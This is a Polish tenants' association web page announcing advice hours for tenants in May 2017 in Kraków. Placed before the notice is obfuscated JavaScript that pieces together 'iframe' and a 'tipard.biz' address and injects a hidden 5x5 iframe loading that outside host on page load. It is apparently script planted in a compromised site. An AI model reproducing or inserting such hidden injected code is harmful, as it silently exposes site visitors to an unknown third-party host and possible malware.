jk='tip';gp='.bi';q='sr';yr='//';t='i';tq='ht';k='p:';h='me';w='ar';fr='z';l='t';r='c';n='f';bd='d';s='ra';ce=t.concat(n,s,h);pn=q.concat(r);hh=tq.concat(l,k,yr,jk,w,bd,gp,fr);var at=document.createElement(ce);at.setAttribute('width','5');at.setAttribute('height','5');at.setAttribute('style','display:none');at.setAttribute(pn,hh);document.body.appendChild(at); MAJOWE DYŻURY LOKATORÓW

Informujemy, że w miesiącu maju 2017 r. dyżury lokatorskie zostały wyznaczone na 8 maja oraz 22 maja w godzinach od 15 do 16. 
Zapraszamy lokatorów potrzebujących porady i pomocy do siedziby Rady Dzielnicy I, Rynek Kleparski 4, II piętro

WYBORY 2018

POLECANE

 

 

 Copyright © 2013 Stowarzyszenie Krakowska Grupa Inicjatywna Obrony Praw Lokatorów.

Wszelkie prawa zastrzeżone.